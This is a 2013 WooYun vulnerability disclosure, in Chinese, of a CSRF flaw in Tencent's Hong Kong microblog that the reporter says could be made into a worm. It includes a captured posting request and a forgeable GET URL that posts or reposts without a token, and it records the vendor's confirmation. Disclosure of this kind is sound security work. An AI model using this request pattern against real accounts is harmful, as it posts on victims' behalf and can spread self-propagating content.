当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026269

漏洞标题:腾讯微博csrf可构造蠕虫

相关厂商:腾讯

漏洞作者: 带馅儿馒头

提交时间:2013-06-18 21:22

修复时间:2013-08-02 21:23

公开时间:2013-08-02 21:23

漏洞类型:CSRF

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-18: 细节已通知厂商并且等待厂商处理中
2013-06-19: 厂商已经确认,细节仅向厂商公开
2013-06-29: 细节向核心白帽子及相关领域专家公开
2013-07-09: 细节向普通白帽子公开
2013-07-19: 细节向实习白帽子公开
2013-08-02: 细节向公众公开

简要描述:

RT

详细说明:

依然是t.hk.qq.com


1.直接发布一条微博并抓包得到如下数据;

POST /index.php/index/t/add HTTP/1.1
Host: t.hk.qq.com
Proxy-Connection: keep-alive
Content-Length: 776
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://t.hk.qq.com
User-Agent:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydAxCJafTU9L2NcZD
Referer: http://t.hk.qq.com/index.php/u/littlebirb
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie:
------WebKitFormBoundarydAxCJafTU9L2NcZD
Content-Disposition: form-data; name="type"
1
------WebKitFormBoundarydAxCJafTU9L2NcZD
Content-Disposition: form-data; name="callback"
parent.onSendboxResponse
------WebKitFormBoundarydAxCJafTU9L2NcZD
Content-Disposition: form-data; name="format"
html
------WebKitFormBoundarydAxCJafTU9L2NcZD
Content-Disposition: form-data; name="music"
------WebKitFormBoundarydAxCJafTU9L2NcZD
Content-Disposition: form-data; name="video"
------WebKitFormBoundarydAxCJafTU9L2NcZD
Content-Disposition: form-data; name="content"
testtest
------WebKitFormBoundarydAxCJafTU9L2NcZD
Content-Disposition: form-data; name="pic"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarydAxCJafTU9L2NcZD--


2.但是发现也能通过get请求方式提交,构造如下请求;

9.jpg


3.点击刚刚发布的连接效果如下;

10.jpg


4.返回页面刷新,成功发布一条微博;

11.jpg


5.另外,转发一条微博同样也能使用get方式提交请求,这里就不展示了;

http://t.hk.qq.com/index.php/index/t/add?type=2&content=aaa&reid=1234567890&format=html

漏洞证明:

见详细说明

修复方案:

你们懂的

版权声明:转载请注明来源 带馅儿馒头@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-06-19 10:46

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无